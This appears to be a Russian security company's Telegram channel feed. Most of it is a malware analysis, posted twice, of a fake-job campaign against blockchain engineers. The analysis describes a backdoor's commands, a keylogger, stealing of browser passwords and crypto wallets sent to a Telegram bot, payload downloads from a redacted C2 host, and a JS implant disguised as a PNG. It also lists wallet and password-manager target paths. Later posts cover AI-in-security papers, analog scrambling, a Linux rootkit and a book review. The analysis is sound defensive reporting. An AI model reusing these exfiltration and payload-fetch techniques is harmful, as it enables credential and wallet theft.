«Слово криптана» или как мошенники нацелились на блокчейн-инженеров. Часть 3. Бэкдор, RAT и при чём тут Telegram
Как мы говорили выше, описание атаки продолжим довольно скоро. Продолжаем. В этой части разберём возможности устанавливаемого в систему бэкдора pay, список команд которого приведён в предыдущем посте, а также дальнейшую вредоносную активность.
Ниже приведено детально описание команд бэкдора pay:
ssh_obj – исполняет команды, полученные от сервера (по сути, выполняет полученную строку через subprocess.Popen(…) с аргументом shell = True). Таким образом можно выполнить практически любое действие в системе жертвы. Крайне полезно для закрепления, повышения привилегий и дальнейшего продвижения.
ssh_cmd – если args == delete, то удаляет данный файл после закрытия соединения (других аргументов в коде скрипта обнаружено не было).
ssh_clip – отправляет на сервер содержимое глобальной переменной e_buf (о ней расскажем чуть позже).
ssh_run – скачивает c http://<XXX.XXX.XXX.XXX>:1244/brow/NVRlYW05 в ~/.n2/bow и запускает его.
ssh_upload – в зависимости от переданного аргумента может загружать папки, файлы, искать определенные файлы и папки и загружать их.
ssh_kill – завершает процессы браузеров Brave и Chrome.
ssh_any – скачивает нагрузку с http://<XXX.XXX.XXX.XXX>:1244/adc/NVRlYW05 в ~/.n2/adc и запускает её.
ssh_env – в аргументе приходят данные для подключения к FTP-серверу. Если компьютер работает под управлением Windows, происходит отправка файлов из папок ~/Documents и ~/Downloads. В противном случае отправляются файлы из папок ~/home ~/Volumes.
ssh_zcp – создает временную папку, в которую копирует файлы из расширений браузеров, которые являются криптокошельками. Список весьма внушительный, публиковать его здесь мы не будем. Просто поверьте, что там много. Значительно больше, чем в листинге из предыдущего поста. В эту же папку копируются файлы клиентских криптокошельков:
После этого временная папка сжимается и отправляется Telegram-боту, токен от которого был получен в аргументе к команде (работа через Telegram набирает популярность). Если отправка боту завершилась с ошибкой, происходит загрузка на FTP сервер.
Если система работает под управлением Windows, будет запущен keylogger, результаты которого будут записываться в глобальную переменную e_buf, содержимое которой, в свою очередь, будет отправлено на сервер при вызове функции ssh_clip, о которой шла речь выше.
По сути, бэкдор позволяет на время своей работы получить контроль над системой с теми же возможностями, что и текущий пользователь.
Но это ещё не всё. Ведь у нас осталось ещё два скрипта: bow и adc
bow
Скрипт bow пытается дешифровать логин и пароль из популярных браузеров (Chrome, Opera, Brave, Yandex, Microsoft Edge) и отправить их на http://<XXX.XXX.XXX.XXX>:1244/keys
adc
Если компьютер находится под управлением Windows, скрипт пытается обратиться к http://<XXX.XXX.XXX.XXX>:1244/any , скачать Anydesk.exe (утилита для удалённого администрирования системы) и установить его. После этого в конфигурационный файл прописываются свои данные. Если же компьютер находится под управлением Linux, скрипт пытается найти уже установленный Anydesk и дописывает в файл конфигурации свои данные. Таким образом на системе жертвы устанавливается полноценный RAT (Remote Access Trojan) с широчайшими возможностями для любых дальнейших действий.
Выводы... А выводы будут чуть позже
#offensive #malware #фишинг #blockchain
Как мы говорили выше, описание атаки продолжим довольно скоро. Продолжаем. В этой части разберём возможности устанавливаемого в систему бэкдора pay, список команд которого приведён в предыдущем посте, а также дальнейшую вредоносную активность.
Ниже приведено детально описание команд бэкдора pay:
ssh_obj – исполняет команды, полученные от сервера (по сути, выполняет полученную строку через subprocess.Popen(…) с аргументом shell = True). Таким образом можно выполнить практически любое действие в системе жертвы. Крайне полезно для закрепления, повышения привилегий и дальнейшего продвижения.
ssh_cmd – если args == delete, то удаляет данный файл после закрытия соединения (других аргументов в коде скрипта обнаружено не было).
ssh_clip – отправляет на сервер содержимое глобальной переменной e_buf (о ней расскажем чуть позже).
ssh_run – скачивает c http://<XXX.XXX.XXX.XXX>:1244/brow/NVRlYW05 в ~/.n2/bow и запускает его.
ssh_upload – в зависимости от переданного аргумента может загружать папки, файлы, искать определенные файлы и папки и загружать их.
ssh_kill – завершает процессы браузеров Brave и Chrome.
ssh_any – скачивает нагрузку с http://<XXX.XXX.XXX.XXX>:1244/adc/NVRlYW05 в ~/.n2/adc и запускает её.
ssh_env – в аргументе приходят данные для подключения к FTP-серверу. Если компьютер работает под управлением Windows, происходит отправка файлов из папок ~/Documents и ~/Downloads. В противном случае отправляются файлы из папок ~/home ~/Volumes.
ssh_zcp – создает временную папку, в которую копирует файлы из расширений браузеров, которые являются криптокошельками. Список весьма внушительный, публиковать его здесь мы не будем. Просто поверьте, что там много. Значительно больше, чем в листинге из предыдущего поста. В эту же папку копируются файлы клиентских криптокошельков:
app_win_array={r"%LocalAppData%\\1Password":"1pass",r"%AppData%\\Exodus":"exodus",
r"%AppData%\\atomic":"atomic",r"%AppData%\\Electrum":"electrum",
r"%AppData%\\WinAuth":"winauth",
r"%AppData%\\Proxifier4\\Profiles":"proxifier4",
r"%AppData%\\Dashlane":"dashlane"}app_osx_array={m_base_p+"Exodus":"exodus",m_base_p+"atomic":"atomic"}
app_linux_array={l_conf_p+"Exodus":"exodus",l_conf_p+"atomic":"atomic"}После этого временная папка сжимается и отправляется Telegram-боту, токен от которого был получен в аргументе к команде (работа через Telegram набирает популярность). Если отправка боту завершилась с ошибкой, происходит загрузка на FTP сервер.
Если система работает под управлением Windows, будет запущен keylogger, результаты которого будут записываться в глобальную переменную e_buf, содержимое которой, в свою очередь, будет отправлено на сервер при вызове функции ssh_clip, о которой шла речь выше.
По сути, бэкдор позволяет на время своей работы получить контроль над системой с теми же возможностями, что и текущий пользователь.
Но это ещё не всё. Ведь у нас осталось ещё два скрипта: bow и adc
bow
Скрипт bow пытается дешифровать логин и пароль из популярных браузеров (Chrome, Opera, Brave, Yandex, Microsoft Edge) и отправить их на http://<XXX.XXX.XXX.XXX>:1244/keys
adc
Если компьютер находится под управлением Windows, скрипт пытается обратиться к http://<XXX.XXX.XXX.XXX>:1244/any , скачать Anydesk.exe (утилита для удалённого администрирования системы) и установить его. После этого в конфигурационный файл прописываются свои данные. Если же компьютер находится под управлением Linux, скрипт пытается найти уже установленный Anydesk и дописывает в файл конфигурации свои данные. Таким образом на системе жертвы устанавливается полноценный RAT (Remote Access Trojan) с широчайшими возможностями для любых дальнейших действий.
Выводы... А выводы будут чуть позже
#offensive #malware #фишинг #blockchain
🔥8👍3
«Слово криптана» или как мошенники нацелились на блокчейн-инженеров. Часть 4. Заключение
В этом посте попытаемся обобщить результаты анализа фишинговой активности и вредоносных нагрузок (см. часть 1, часть 2 и часть 3).
Первый вопрос, который всплывает в голове: единственный ли это репозиторий, который используется мошенниками? К сожалению, нет. Вот пример ещё одного репозитория, где имплант находится в файле public/Marketing/imgs/fb-logo.png . Этот файл, несмотря на вводящее в опасное заблуждение расширение, является обфусцированным js-скриптом, который обращается к папкам расширений криптокошельков браузеров (Chrome, Opera, Brave, Firefox, Microsoft Edge), собирает оттуда файлы и отправляет их по адресу http://XXX.XXX.XXX.XXX:1224/uploads. Также этот скрипт загружает файл client с адреса http://XXX.XXX.XXX.XXX:1224/client/10/106. Если машина управляется Windows, дополнительно скачивается архив pi2.zip с адреса http://XXX.XXX.XXX.XXX:1224/pdown. В архиве находятся python-скрипты с названиями, функционалом и методами обфускации, сходными с описанными выше. Это говорит нам об одном авторстве вредоносных нагрузок. Разница, по сути, только в имплантах.
Качество фишинговых атак возрастает. Сайты компаний и объявления сделаны довольно качественно, репозитории с кодом размещены на популярных площадках. Сами импланты и их обфускация заслуживают отдельного внимания. Импланты размещены «глубоко в коде» - в файлах, расположенных «не на виду», которые при беглом взгляде кажутся совершенно не важными, чтобы заострять на них внимание. Обфускация и шифрование имплантов призваны затруднить декодирование вредоносной нагрузки. Незаинтересованный человек, даже если увидит имплант, скорее всего просто не станет дальше копать и прекратит общение с мошенниками, потому что декодирование нагрузки требует некоторого времени и немного поскриптовать. В декодированных вредоносных скриптах адреса удалённых ресурсов не присутствуют в явном виде, а собираются из закодированных строк. Всё вышесказанное намекает на противодействие в том числе и автоматизированному анализу.
Специалисты по блокчейн выбраны в качестве жертв неслучайно, т.к. вероятность, что на их устройствах будут криптокошельки, существенно выше, чем в других случаях. Впрочем, нагрузки достаточно универсальны, довольно неплохо сделаны и могут использоваться не только для атак на блокчейн-инженеров. Кражей кошельков дело не ограничивается - мошенники пытаются получить доступ к другой чувствительной информации: логины с паролями, содержимое буфера обмена. Также запускается backdoor, что позволяет злоумышленникам осуществлять широкий спектр действий на компьютере жертвы. В этот момент злоумышленники знают о системе жертвы практически всё, что позволяет им работать целенаправленно, повышая свою эффективность. Запуск Anydesk в роли RAT усугубляет проблему и позволяет мошенникам оперировать компьютером жертвы практически как своим собственным.
Загрузка данных Telegram-боту выглядит интересно. Технология не так уж и нова, но довольно удобна и эффективна, поэтому набирает популярность и встречается всё чаще. Даже в корпоративных инфраструктурах блокировка Telegram – не столь частое явление, а зачастую Telegram – это полноценный рабочий инструмент в том числе и в больших компаниях. Десктопные клиенты мессенджеров в корпоративной инфраструктуре встречаются нередко, а значит, такой трафик не вызовет подозрений на периметре. Т.е., если соискатель проходит «собеседование» на рабочем месте в компании, то, учитывая внушительные возможности устанавливаемого злоумышленниками инструментария, вероятность компрометации всей корпоративной инфраструктуры крайне высока.
Число вредоносов на некомпилируемых языках (типа Python) растёт. Это позволяет атаковать широкий спектр систем, базирующихся на Windows, Linux, MacOS.
#offensive #malware #blockchain
В этом посте попытаемся обобщить результаты анализа фишинговой активности и вредоносных нагрузок (см. часть 1, часть 2 и часть 3).
Первый вопрос, который всплывает в голове: единственный ли это репозиторий, который используется мошенниками? К сожалению, нет. Вот пример ещё одного репозитория, где имплант находится в файле public/Marketing/imgs/fb-logo.png . Этот файл, несмотря на вводящее в опасное заблуждение расширение, является обфусцированным js-скриптом, который обращается к папкам расширений криптокошельков браузеров (Chrome, Opera, Brave, Firefox, Microsoft Edge), собирает оттуда файлы и отправляет их по адресу http://XXX.XXX.XXX.XXX:1224/uploads. Также этот скрипт загружает файл client с адреса http://XXX.XXX.XXX.XXX:1224/client/10/106. Если машина управляется Windows, дополнительно скачивается архив pi2.zip с адреса http://XXX.XXX.XXX.XXX:1224/pdown. В архиве находятся python-скрипты с названиями, функционалом и методами обфускации, сходными с описанными выше. Это говорит нам об одном авторстве вредоносных нагрузок. Разница, по сути, только в имплантах.
Качество фишинговых атак возрастает. Сайты компаний и объявления сделаны довольно качественно, репозитории с кодом размещены на популярных площадках. Сами импланты и их обфускация заслуживают отдельного внимания. Импланты размещены «глубоко в коде» - в файлах, расположенных «не на виду», которые при беглом взгляде кажутся совершенно не важными, чтобы заострять на них внимание. Обфускация и шифрование имплантов призваны затруднить декодирование вредоносной нагрузки. Незаинтересованный человек, даже если увидит имплант, скорее всего просто не станет дальше копать и прекратит общение с мошенниками, потому что декодирование нагрузки требует некоторого времени и немного поскриптовать. В декодированных вредоносных скриптах адреса удалённых ресурсов не присутствуют в явном виде, а собираются из закодированных строк. Всё вышесказанное намекает на противодействие в том числе и автоматизированному анализу.
Специалисты по блокчейн выбраны в качестве жертв неслучайно, т.к. вероятность, что на их устройствах будут криптокошельки, существенно выше, чем в других случаях. Впрочем, нагрузки достаточно универсальны, довольно неплохо сделаны и могут использоваться не только для атак на блокчейн-инженеров. Кражей кошельков дело не ограничивается - мошенники пытаются получить доступ к другой чувствительной информации: логины с паролями, содержимое буфера обмена. Также запускается backdoor, что позволяет злоумышленникам осуществлять широкий спектр действий на компьютере жертвы. В этот момент злоумышленники знают о системе жертвы практически всё, что позволяет им работать целенаправленно, повышая свою эффективность. Запуск Anydesk в роли RAT усугубляет проблему и позволяет мошенникам оперировать компьютером жертвы практически как своим собственным.
Загрузка данных Telegram-боту выглядит интересно. Технология не так уж и нова, но довольно удобна и эффективна, поэтому набирает популярность и встречается всё чаще. Даже в корпоративных инфраструктурах блокировка Telegram – не столь частое явление, а зачастую Telegram – это полноценный рабочий инструмент в том числе и в больших компаниях. Десктопные клиенты мессенджеров в корпоративной инфраструктуре встречаются нередко, а значит, такой трафик не вызовет подозрений на периметре. Т.е., если соискатель проходит «собеседование» на рабочем месте в компании, то, учитывая внушительные возможности устанавливаемого злоумышленниками инструментария, вероятность компрометации всей корпоративной инфраструктуры крайне высока.
Число вредоносов на некомпилируемых языках (типа Python) растёт. Это позволяет атаковать широкий спектр систем, базирующихся на Windows, Linux, MacOS.
#offensive #malware #blockchain
🔥6👍1🤯1
Для тех, кто интересуется фаззингом, свеженькая презентация доклада Advanced Fuzzing With LibAFL с Ekoparty 2024: https://docs.google.com/presentation/d/1ILXdsBx6JJbsf3uq-_hSeYux-a0DRRPxebOY65EDE5o/
#реверсинг #почитать #фаззинг
#реверсинг #почитать #фаззинг
👍3
В Калужской Бауманке прошла Неделя Безопасника.
Небольшая конференция, соревнования CTF, мастер-классы. Были рады поучаствовать: помочь с ресурсами, провести мастер-класс по реверсингу. Соревнования CTF, учитывая,что участвовали младшие курсы, прошли, на наш взгляд, вполне достойно. Крайне радует инициативность студентов, которые организовали эти соревнования. Ребята, вы большие молодцы! Продолжайте в том же духе, а мы вам, конечно, поможем! Далее будем сотрудничать с Бауманкой ещё активнее, у заинтересованных сторон есть желание и ресурсы. Ну а незаинтересованных мы попросту не возьмём в эту лодку ;)
Обещал список интересных, на мой взгляд, работ и ссылок про ИИ в области ИБ. Их на самом деле довольно много, но вот то, что, на мой взгляд, самое вкусное:
Защита
Winter, P., Lampesberger, H., Zeilinger, M., Hermann, E. (2011). On Detecting Abrupt Changes in Network Entropy Time Series. In: De Decker, B., Lapon, J., Naessens, V., Uhl, A. (eds) Communications and Multimedia Security. CMS 2011. Lecture Notes in Computer Science, vol 7025. Springer, Berlin, Heidelberg. https://doi.org/10.1007/978-3-642-24712-5_18
Jaafer Al-Saraireh, Ala' Masarweh, A novel approach for detecting advanced persistent threats, Egyptian Informatics Journal, Volume 23, Issue 4, 2022, Pages 45-55, ISSN 1110-8665, https://doi.org/10.1016/j.eij.2022.06.005
Do Xuan, C. . (2021). Detecting APT Attacks Based on Network Traffic Using Machine Learning. Journal of Web Engineering, 20(1), 171–190. https://doi.org/10.13052/jwe1540-9589.2019
Hasan, M.M., Islam, M.U. & Uddin, J. Advanced Persistent Threat Identification with Boosting and Explainable AI. SN COMPUT. SCI. 4, 271 (2023). https://doi.org/10.1007/s42979-023-01744-x
Щелкунова Н.В, Щелкунов Д.А, О статическом анализе исполняемых файлов на содержание вредоносного кода, РусКрипто-2024 https://ruscrypto.ru/resource/archive/rc2024/files/06_shelkunov_shelkunova.pdf
Cylance Data Team, Introduction to Artificial Intelligence for Security Professionals
Sharma, Sanjay & Challa, Rama & Sahay, Sanjay. (2019). Detection of Advanced Malware by Machine Learning Techniques. 10.48550/arXiv.1903.02966.
Bensaoud, Ahmed & Abudawaood, Nawaf & Kalita, Jugal. (2020). Classifying Malware Images with Convolutional Neural Network Models. 10.48550/arXiv.2010.16108.
Rhode, Matilda & Burnap, Pete & Jones, Kevin. (2017). Early Stage Malware Prediction Using Recurrent Neural Networks. Computers & Security. 77. 10.1016/j.cose.2018.05.010.
Chaoxian Wei, Qiang Li, Dong Guo, Xiangyu Meng, Toward Identifying APT Malware through API System Calls, Security and Communication Networks, vol. 2021, Article ID 8077220, 14 pages, 2021. https://doi.org/10.1155/2021/8077220
S. M. Milajerdi, R. Gjomemo, B. Eshete, R. Sekar, and V. Venkatakrishnan, “Holmes: Real-time apt detection through correlation of suspicious information flows,” in Symposium on Security and Privacy. IEEE, 2019.
M. Barre, A. Gehani, and V. Yegneswaran, “Mining data provenance to detect advanced persistent threats,” in 11th International Workshop on Theory and Practice of Provenance (TaPP), 2019
Xueyuan Han, Thomas F. J.-M. Pasquier, Adam Bates, James Mickens, Margo I. Seltzer, Unicorn: Runtime Provenance-Based Detector for Advanced Persistent Threats. NDSS, 2020, doi:10.14722/ndss.2020.2
Нападение
https://github.com/TheR1D/shell_gpt
https://github.com/aress31/burpgpt
https://github.com/protectai/vulnhuntr
Hilario, E., Azam, S., Sundaram, J. et al. Generative AI for pentesting: the good, the bad, the ugly. Int. J. Inf. Secur. 23, 2075–2097 (2024). https://doi.org/10.1007/s10207-024-00835-x
Happe, Andreas & Cito, Jürgen. (2023). Getting pwn'd by AI: Penetration Testing with Large Language Models. 10.48550/arXiv.2308.00121.
Richard Fang, Rohan Bindu, Akul Gupta, Qiusi Zhan, Daniel Kang. Teams of LLM Agents can Exploit Zero-Day Vulnerabilities. https://doi.org/10.48550/arXiv.2406.01637
#почитать #ии #offensive #антивирус
Небольшая конференция, соревнования CTF, мастер-классы. Были рады поучаствовать: помочь с ресурсами, провести мастер-класс по реверсингу. Соревнования CTF, учитывая,что участвовали младшие курсы, прошли, на наш взгляд, вполне достойно. Крайне радует инициативность студентов, которые организовали эти соревнования. Ребята, вы большие молодцы! Продолжайте в том же духе, а мы вам, конечно, поможем! Далее будем сотрудничать с Бауманкой ещё активнее, у заинтересованных сторон есть желание и ресурсы. Ну а незаинтересованных мы попросту не возьмём в эту лодку ;)
Обещал список интересных, на мой взгляд, работ и ссылок про ИИ в области ИБ. Их на самом деле довольно много, но вот то, что, на мой взгляд, самое вкусное:
Защита
Winter, P., Lampesberger, H., Zeilinger, M., Hermann, E. (2011). On Detecting Abrupt Changes in Network Entropy Time Series. In: De Decker, B., Lapon, J., Naessens, V., Uhl, A. (eds) Communications and Multimedia Security. CMS 2011. Lecture Notes in Computer Science, vol 7025. Springer, Berlin, Heidelberg. https://doi.org/10.1007/978-3-642-24712-5_18
Jaafer Al-Saraireh, Ala' Masarweh, A novel approach for detecting advanced persistent threats, Egyptian Informatics Journal, Volume 23, Issue 4, 2022, Pages 45-55, ISSN 1110-8665, https://doi.org/10.1016/j.eij.2022.06.005
Do Xuan, C. . (2021). Detecting APT Attacks Based on Network Traffic Using Machine Learning. Journal of Web Engineering, 20(1), 171–190. https://doi.org/10.13052/jwe1540-9589.2019
Hasan, M.M., Islam, M.U. & Uddin, J. Advanced Persistent Threat Identification with Boosting and Explainable AI. SN COMPUT. SCI. 4, 271 (2023). https://doi.org/10.1007/s42979-023-01744-x
Щелкунова Н.В, Щелкунов Д.А, О статическом анализе исполняемых файлов на содержание вредоносного кода, РусКрипто-2024 https://ruscrypto.ru/resource/archive/rc2024/files/06_shelkunov_shelkunova.pdf
Cylance Data Team, Introduction to Artificial Intelligence for Security Professionals
Sharma, Sanjay & Challa, Rama & Sahay, Sanjay. (2019). Detection of Advanced Malware by Machine Learning Techniques. 10.48550/arXiv.1903.02966.
Bensaoud, Ahmed & Abudawaood, Nawaf & Kalita, Jugal. (2020). Classifying Malware Images with Convolutional Neural Network Models. 10.48550/arXiv.2010.16108.
Rhode, Matilda & Burnap, Pete & Jones, Kevin. (2017). Early Stage Malware Prediction Using Recurrent Neural Networks. Computers & Security. 77. 10.1016/j.cose.2018.05.010.
Chaoxian Wei, Qiang Li, Dong Guo, Xiangyu Meng, Toward Identifying APT Malware through API System Calls, Security and Communication Networks, vol. 2021, Article ID 8077220, 14 pages, 2021. https://doi.org/10.1155/2021/8077220
S. M. Milajerdi, R. Gjomemo, B. Eshete, R. Sekar, and V. Venkatakrishnan, “Holmes: Real-time apt detection through correlation of suspicious information flows,” in Symposium on Security and Privacy. IEEE, 2019.
M. Barre, A. Gehani, and V. Yegneswaran, “Mining data provenance to detect advanced persistent threats,” in 11th International Workshop on Theory and Practice of Provenance (TaPP), 2019
Xueyuan Han, Thomas F. J.-M. Pasquier, Adam Bates, James Mickens, Margo I. Seltzer, Unicorn: Runtime Provenance-Based Detector for Advanced Persistent Threats. NDSS, 2020, doi:10.14722/ndss.2020.2
Нападение
https://github.com/TheR1D/shell_gpt
https://github.com/aress31/burpgpt
https://github.com/protectai/vulnhuntr
Hilario, E., Azam, S., Sundaram, J. et al. Generative AI for pentesting: the good, the bad, the ugly. Int. J. Inf. Secur. 23, 2075–2097 (2024). https://doi.org/10.1007/s10207-024-00835-x
Happe, Andreas & Cito, Jürgen. (2023). Getting pwn'd by AI: Penetration Testing with Large Language Models. 10.48550/arXiv.2308.00121.
Richard Fang, Rohan Bindu, Akul Gupta, Qiusi Zhan, Daniel Kang. Teams of LLM Agents can Exploit Zero-Day Vulnerabilities. https://doi.org/10.48550/arXiv.2406.01637
#почитать #ии #offensive #антивирус
SpringerLink
On Detecting Abrupt Changes in Network Entropy Time Series
In recent years, much research focused on entropy as a metric describing the “chaos” inherent to network traffic. In particular, network entropy time series turned out to be a scalable technique to detect unexpected behavior in network traffic. In this...
👍11
Про аналоговую "криптографию" и зачем нужно скремблирование сигнала
Что делать, если сигнал аналоговый и его нужно как-то пошифровать? Казалось бы, ответ на поверхности: АЦП - шифратор - ЦАП. Есть надёжные блочные и поточные шифры. Их много, выбирай на вкус. Такие удивительные инженерные решения действительно встречаются не так уж редко. Стоят каких-то денег. Зачастую денег не таких уж и маленьких, ибо компоненты, обвязка и программирование дороги.
Интересно вот что: инженеры, создающие такие устройства, как и те, кто ставит им такие удивительные задачи, перед тем как погрузиться в эту занимательную работу, понимают, почему сигнал изначально аналоговый? Если да, то тут всё понятно. Если нет, то ... надо что-то делать с университетской базой. Ключевым преимуществом аналоговых систем является расстояние в совокупности с ценой. Что такое помеха в аналоговом телевидении? Это вы будете видеть картинку с помехами (ну там будет немного снега, волны могут пойти небольшие), понимая при этом, что на ней. Неприятно, но можно работать. Что такое помеха в цифровом телевидении? Кубики и регулярная пропажа изображения. При неустойчивом приёме цифрового сигнала теряются пакеты. Все с этим сталкивались так или иначе - телевидение то у всех сейчас цифровое. Эту проблему пытаются победить помехоустойчивым кодированием, которое тоже требует ресурсов и не является панацеей: мы добавляем в пакет проверочные биты, тем самым удлиняя его, а число ошибок, которые код может исправить, невелико. Чем больше ошибок может исправить код, тем больше избыточность и тем выше вероятность нахватать ещё ошибок.
Что мы имеем, когда втыкаем АЦП - шифрование - ЦАП в полностью аналоговую систему, скажем, перед модулятором? Мы сводим ключевое преимущество аналоговой передачи контента (большое расстояние при небольшой цене) на нет. Если шифр блочный в режиме ECB, то плохо, ибо лавинный эффект (изменение одного бита шифротекста приведёт к совершенно другому тексту при расшифровке). Если поточный, то не особо лучше, ибо костыли с синхронизацией состояний ГПСЧ, которые крутятся на передатчике и приёмнике. Короче, городить протоколы поверх. А, ну и временной лаг, ибо все эти математические операции требуют ресурсов, как и АЦП с ЦАП-ом. Полсекунды запросто.
А как воткнуть хоть какое-то шифрование в полностью аналоговую систему, чтобы и качество не ухудшилось, и задержек почти не было, и ценник был небольшим? Есть такая штука: скремблирование. Это изменение непосредственно самого аналогового сигнала без его "оцифровки". Тут много подходов, начиная с простого фазового инвертора на одном транзисторе, заканчивая, например, вот такими вещами с использованием теории Хаоса для генерации маскирующего сигнала: https://ieeexplore.ieee.org/document/5174046
#криптография #скремблер
Что делать, если сигнал аналоговый и его нужно как-то пошифровать? Казалось бы, ответ на поверхности: АЦП - шифратор - ЦАП. Есть надёжные блочные и поточные шифры. Их много, выбирай на вкус. Такие удивительные инженерные решения действительно встречаются не так уж редко. Стоят каких-то денег. Зачастую денег не таких уж и маленьких, ибо компоненты, обвязка и программирование дороги.
Интересно вот что: инженеры, создающие такие устройства, как и те, кто ставит им такие удивительные задачи, перед тем как погрузиться в эту занимательную работу, понимают, почему сигнал изначально аналоговый? Если да, то тут всё понятно. Если нет, то ... надо что-то делать с университетской базой. Ключевым преимуществом аналоговых систем является расстояние в совокупности с ценой. Что такое помеха в аналоговом телевидении? Это вы будете видеть картинку с помехами (ну там будет немного снега, волны могут пойти небольшие), понимая при этом, что на ней. Неприятно, но можно работать. Что такое помеха в цифровом телевидении? Кубики и регулярная пропажа изображения. При неустойчивом приёме цифрового сигнала теряются пакеты. Все с этим сталкивались так или иначе - телевидение то у всех сейчас цифровое. Эту проблему пытаются победить помехоустойчивым кодированием, которое тоже требует ресурсов и не является панацеей: мы добавляем в пакет проверочные биты, тем самым удлиняя его, а число ошибок, которые код может исправить, невелико. Чем больше ошибок может исправить код, тем больше избыточность и тем выше вероятность нахватать ещё ошибок.
Что мы имеем, когда втыкаем АЦП - шифрование - ЦАП в полностью аналоговую систему, скажем, перед модулятором? Мы сводим ключевое преимущество аналоговой передачи контента (большое расстояние при небольшой цене) на нет. Если шифр блочный в режиме ECB, то плохо, ибо лавинный эффект (изменение одного бита шифротекста приведёт к совершенно другому тексту при расшифровке). Если поточный, то не особо лучше, ибо костыли с синхронизацией состояний ГПСЧ, которые крутятся на передатчике и приёмнике. Короче, городить протоколы поверх. А, ну и временной лаг, ибо все эти математические операции требуют ресурсов, как и АЦП с ЦАП-ом. Полсекунды запросто.
А как воткнуть хоть какое-то шифрование в полностью аналоговую систему, чтобы и качество не ухудшилось, и задержек почти не было, и ценник был небольшим? Есть такая штука: скремблирование. Это изменение непосредственно самого аналогового сигнала без его "оцифровки". Тут много подходов, начиная с простого фазового инвертора на одном транзисторе, заканчивая, например, вот такими вещами с использованием теории Хаоса для генерации маскирующего сигнала: https://ieeexplore.ieee.org/document/5174046
#криптография #скремблер
👍4
Малварь под Linux эволюционирует, а злоумышленники серьёзно нацеливаются на Linux -системы. Интенсивно растёт как число вредоносов, так и их качество и технологичность. Совершенствуются и технологии защиты от обнаружения. Для сокрытия вредоносной активности часто используются руткиты. Вот хороший пример: https://xakep.ru/2024/12/17/pumakit/
В общем, всё ещё используемый иногда тезис "у меня Linux, поэтому я никому не нужен" безнадёжно устарел. Анализа логов тоже недостаточно. Нужна полноценная endpoint-защита
#malware #антивирус
В общем, всё ещё используемый иногда тезис "у меня Linux, поэтому я никому не нужен" безнадёжно устарел. Анализа логов тоже недостаточно. Нужна полноценная endpoint-защита
#malware #антивирус
XAKEP
Обнаружен новый Linux-руткит Pumakit
Аналитики Elastic Security обнаружили новый руткит для Linux под названием Pumakit. Малварь использует повышение привилегий, чтобы скрывать свое присутствие в системах жертв.
👍4
Ни убавить - ни прибавить. Всяких телеграмов тоже касается
Forwarded from Антонов такой Антонов
Заодно передаю пламенный привет всем участникам ежегодной акции «сдай ЦРУ всех известных тебе сотрудников ФСБ с помощью мессенджера WhatsApp». Никак вы, блядь, не научитесь 😩
This media is not supported in your browser
VIEW IN TELEGRAM
Никуда не скроешься от цепкого электронного взгляда нашего Ковальски :)
По сравнению с более ранними версиями алгоритмы и модели стали гораздо быстрее и качественнее. Объект (в данном случае я) обнаруживается, классифицируется, сопровождается. Модель под капотом данной версии умеет классифицировать несколько объектов одновременно. Всё это работает на одноплатнике ценой около 6 т.р.
#видеоаналитика #ии #ковальски #робототехника
По сравнению с более ранними версиями алгоритмы и модели стали гораздо быстрее и качественнее. Объект (в данном случае я) обнаруживается, классифицируется, сопровождается. Модель под капотом данной версии умеет классифицировать несколько объектов одновременно. Всё это работает на одноплатнике ценой около 6 т.р.
#видеоаналитика #ии #ковальски #робототехника
👍2🔥2
Долго думал, что написать в новогоднем посте нашего уютного корпоративного бложика. За год столько всего произошло, что одного поста будет мало. Потому решил кратко: мы серьёзно подросли, выполнили все планы, стартовали ряд новых направлений. Ковальски подтверждает. В Новом Году желаем всем здоровья, успехов, благополучия и всех благ!
Telegram
Рекриптор
Никуда не скроешься от цепкого электронного взгляда нашего Ковальски :)
По сравнению с более ранними версиями алгоритмы и модели стали гораздо быстрее и качественнее. Объект (в данном случае я) обнаруживается, классифицируется, сопровождается. Модель под…
По сравнению с более ранними версиями алгоритмы и модели стали гораздо быстрее и качественнее. Объект (в данном случае я) обнаруживается, классифицируется, сопровождается. Модель под…
👍5
Пока каникулы, прочитал Обработка естественного языка в действии
Неплохое введение в NLP (Natural Language Processing). Из плюсов: довольно свежий обзор используемого мат. аппарата и алгоритмов за исключением, пожалуй, трансформеров и больших языковых моделей.
Из минусов: перевод так себе.
Не знаю, отнести это к плюсам или минусам: подробного описания алгоритмов и подходов нет, отражена только суть. Подробности нужно гуглить. К прочтению однозначно рекомендую хотя бы для расширения кругозора
#почитать
Неплохое введение в NLP (Natural Language Processing). Из плюсов: довольно свежий обзор используемого мат. аппарата и алгоритмов за исключением, пожалуй, трансформеров и больших языковых моделей.
Из минусов: перевод так себе.
Не знаю, отнести это к плюсам или минусам: подробного описания алгоритмов и подходов нет, отражена только суть. Подробности нужно гуглить. К прочтению однозначно рекомендую хотя бы для расширения кругозора
#почитать
www.labirint.ru
Книга: "Обработка естественного языка в действии" - Хобсон, Ханнес, Коул. Купить книгу, читать рецензии | Лабиринт
Книга: Обработка естественного языка в действии (Natural Language Processing in Action. Understanding, analyzing, and generating text with Python).📙 Автор: Хобсон, Ханнес, Коул. Аннотация, 🔝 отзывы читателей, иллюстрации. Купить книгу по привлекательной цене…
Хороший блог с хорошими статьями по анализу малвари: https://exploitreversing.com/
#почитать #реверсинг
#почитать #реверсинг
Exploit Reversing
A blog about vulnerability research, exploit development and reverse engineering.
👍1
Давно ожидаемое в том числе и нами набирает обороты. В отрасли ИБ тоже. Дальше будет веселее. Уже сейчас некоторые модели неплохо справляются в том числе с задачами реверсинга и поиска уязвимостей. Всё, что можно автоматизировать, будет автоматизировано. Как в нападении, так и в защите. Тем, кто учится на ИБ-специальностях сейчас, нужно учитывать этот долгий тренд и уметь как работать с моделями, так и понимать в общих чертах, что там под капотом. Хорошо, что мы давно делаем ставку на автоматизацию и ИИ: развиваем и усиливаем нашу команду ИИ, разрабатываем и внедряем новые модели.
Выше публиковали список интересных работ про ИИ в области ИБ. Не лишним будет напомнить.
#ии
Выше публиковали список интересных работ про ИИ в области ИБ. Не лишним будет напомнить.
#ии
CNews.ru
Российские ИТ-компании повально закрывают вакансии программистов. Это новый многолетний тренд - CNews
В России ИТ-компании начали частично замещать ИТ-специалистов искусственным интеллектом и перестали пытаться найти живых ИТ-шников, коих в стране катастрофический дефицит. Количество открытых...
👍3
Мошенническая активность
